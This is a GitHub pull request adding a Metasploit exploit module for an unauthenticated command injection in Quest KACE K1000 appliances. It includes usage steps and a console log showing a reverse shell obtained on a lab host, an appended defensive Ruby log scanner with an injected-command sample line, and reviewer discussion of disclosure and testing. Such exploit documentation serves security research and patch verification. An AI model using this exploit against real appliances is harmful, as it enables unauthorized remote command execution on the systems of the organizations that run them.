
Add Quest KACE Systems Management Command Injection #10199

Merged
merged 3 commits into from Jun 26, 2018

@bcoles
Contributor

bcoles commented Jun 22, 2018

Add Quest KACE Systems Management Command Injection exploit module.

     This module exploits a command injection vulnerability in Quest KACE
     Systems Management Appliance version 8.0.318 (and possibly prior).

     The `download_agent_installer.php` file allows unauthenticated users
     to execute arbitrary commands as the web server user `www`.

     A valid Organization ID is required. The default value is `1`.

     A valid Windows agent version number must also be provided. If file
     sharing is enabled, the agent versions are available within the
     `\\kace.local\client\agent_provisioning\windows_platform` Samba share.
     Additionally, various agent versions are listed on the KACE website.

     This module has been tested successfully on Quest KACE Systems
     Management Appliance K1000 version 8.0 (Build 8.0.318).

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/unix/http/quest_kace_systems_management_rce
  • set ORGANIZATION 1
  • set AGENT_VERSION 8.0.152
  • run
  • Verify you get a shell

Scenarios

msf5 > use exploit/unix/http/quest_kace_systems_management_rce 
msf5 exploit(unix/http/quest_kace_systems_management_rce) > set rhost 172.16.191.192
rhost => 172.16.191.192
msf5 exploit(unix/http/quest_kace_systems_management_rce) > check
[*] 172.16.191.192:80 The target appears to be vulnerable.
msf5 exploit(unix/http/quest_kace_systems_management_rce) > set ORGANIZATION 1
ORGANIZATION => 1
set AGENT_VERSION 8.0.152
AGENT_VERSION => 8.0.152
msf5 exploit(unix/http/quest_kace_systems_management_rce) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Sending payload (505 bytes)
[+] Payload executed successfully
[!] Tried to delete /tmp/agentprov/1#;/, unknown result

492648046
kYWSsqpLmmERqEpLazwFOTzulPvsvShY
/kbox/kboxwww/common
EfiuBIzdwhsSLfEpgHrRjbgjszjCkfhf
ZGtYicImqwCnmUNGBZTpqDSPXojYXjkd
jCmxJgLnffuOAlsAFmWygrbOhCWPCNzD
id
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD k1000 11.0-RELEASE-p12 FreeBSD 11.0-RELEASE-p12 #0: Wed Aug  9 10:03:39 UTC 2017     root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  amd64
^C
Abort session 1? [y/N]  y

[*] 172.16.191.192 - Command shell session 1 closed.  Reason: User exit
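As an added example, not code from this PR or from the Metasploit module, here is a small Ruby scanner a defender could run over web server access logs to flag requests to `download_agent_installer.php` whose query parameters carry shell metacharacters. The description above says the endpoint takes an organization ID and an agent version, both of which are plain numbers and dots in legitimate use, so anything else in those values is worth a look. The Common Log Format layout, the `/common/` URL path, the parameter names `org` and `version`, the metacharacter set and every log line are constructed for the example and are not taken from the appliance or the module.

```ruby
# Added example (not part of the Metasploit module or this PR): scan access log
# lines for requests to download_agent_installer.php whose decoded query values
# contain shell metacharacters. Paths, parameter names and log lines below are
# constructed for illustration.
require 'uri'
require 'cgi'

TARGET_SCRIPT = 'download_agent_installer.php'

# Assumption: legitimate organization IDs and agent versions are digits and
# dots only, so any of these characters in a value is suspicious.
SHELL_METACHARS = /[;&|`$<>(){}\n#]/

# Common Log Format: ip ident user [time] "method path proto" status size
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>\S+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Parse one log line into a hash; nil when the line is not in the expected format.
def parse_log_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], time: m[:time], method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Return "name=value" strings for every URL-decoded query value that contains a
# shell metacharacter, or [] if the request is for another script or is clean.
def suspicious_params(request_path)
  uri = begin
    URI.parse(request_path)
  rescue URI::InvalidURIError
    return []
  end
  return [] unless File.basename(uri.path.to_s) == TARGET_SCRIPT
  return [] if uri.query.nil?
  # CGI.parse percent-decodes values, so %3B is examined as ';'.
  CGI.parse(uri.query).flat_map do |name, values|
    values.select { |v| SHELL_METACHARS.match?(v) }.map { |v| "#{name}=#{v}" }
  end
end

# Walk the log and collect entries that look like injection attempts.
def scan_access_log(lines)
  lines.each_with_object([]) do |line, hits|
    entry = parse_log_line(line)
    next unless entry
    bad = suspicious_params(entry[:path])
    next if bad.empty?
    hits << entry.merge(params: bad)
  end
end

# Constructed sample log lines (not captured from a real appliance).
SAMPLE_LOG = [
  '10.0.0.5 - - [22/Jun/2018:10:00:01 +0000] "GET /common/download_agent_installer.php?org=1&version=8.0.152 HTTP/1.1" 200 1024',
  '10.0.0.9 - - [22/Jun/2018:10:00:07 +0000] "GET /common/download_agent_installer.php?org=1%3Bid&version=8.0.152 HTTP/1.1" 200 512',
  '10.0.0.5 - - [22/Jun/2018:10:00:09 +0000] "GET /common/index.php?page=1%3B2 HTTP/1.1" 200 300',
  'garbage line'
].freeze

if $PROGRAM_NAME == __FILE__
  scan_access_log(SAMPLE_LOG).each do |hit|
    puts "#{hit[:time]} #{hit[:ip]} #{hit[:path]} -> #{hit[:params].join(', ')}"
  end
end
```

Only the second constructed line is reported: the first has clean numeric values, the third targets a different script, and the fourth does not parse. Decoding before matching matters because an attacker can percent-encode the metacharacters, and matching only the vulnerable script keeps the check from firing on every `;` elsewhere on the site.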
@bcoles bcoles added the module label Jun 22, 2018
@bcoles bcoles added the docs label Jun 22, 2018
bcoles added 2 commits Jun 22, 2018
@bcoles
Contributor Author

bcoles commented Jun 22, 2018

These issues were reported to the vendor about 4 months ago.

A hotfix for these issues was made public a little over two months ago and subsequently rolled into appliance updates.

hotfix notes

Vulnerability details, including proof-of-concept, have been public for over 3 weeks.

The advisory does not make clear the simplicity with which these issues can be exploited. In particular, the unauthenticated remote command injection vulnerability is easily exploitable, as demonstrated by this module.

This exploit is not fully automated. Knowledge of a valid organization ID and agent version are required. The check method can be used to passively infer the security posture of the appliance by comparing the appliance version against a list of patched versions.

@wchen-r7
Contributor

wchen-r7 commented Jun 22, 2018

Understood. Thank you.

So I downloaded k1000-ovf_80.zip this morning from the official website, looks like they posted it on Dec 15 2017. Do we have to worry about auto-update when we spin up this appliance? Thanks.

@wvu-r7
Member

wvu-r7 commented Jun 22, 2018

@wchen-r7: You could set networking to host-only unless the update is mandatory.

@wchen-r7
Contributor

wchen-r7 commented Jun 22, 2018

Gotcha. Thanks!

@bcoles
Contributor Author

bcoles commented Jun 23, 2018

I had no issues with auto-updates. I also didn't test the hotfix.

@wchen-r7 wchen-r7 requested review from wchen-r7 and space-r7 Jun 25, 2018
@space-r7 space-r7 merged commit 6d3c141 into rapid7:master Jun 26, 2018
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
space-r7 added a commit that referenced this pull request Jun 26, 2018
@space-r7
Contributor

space-r7 commented Jun 26, 2018

Release Notes

Add an exploit module that exploits a command injection vulnerability in Quest KACE Systems Management Appliance version 8.0.318.

@wvu-r7
Member

wvu-r7 commented Jun 26, 2018

@space-r7: If you did any repro, please post logs and/or notes here. Thanks!

@bcoles bcoles deleted the bcoles:quest_kace_systems_management_rce branch Jun 26, 2018
msjenkins-r7 added a commit that referenced this pull request Jun 26, 2018
@tdoan-r7 tdoan-r7 added the rn-exploit label Jul 5, 2018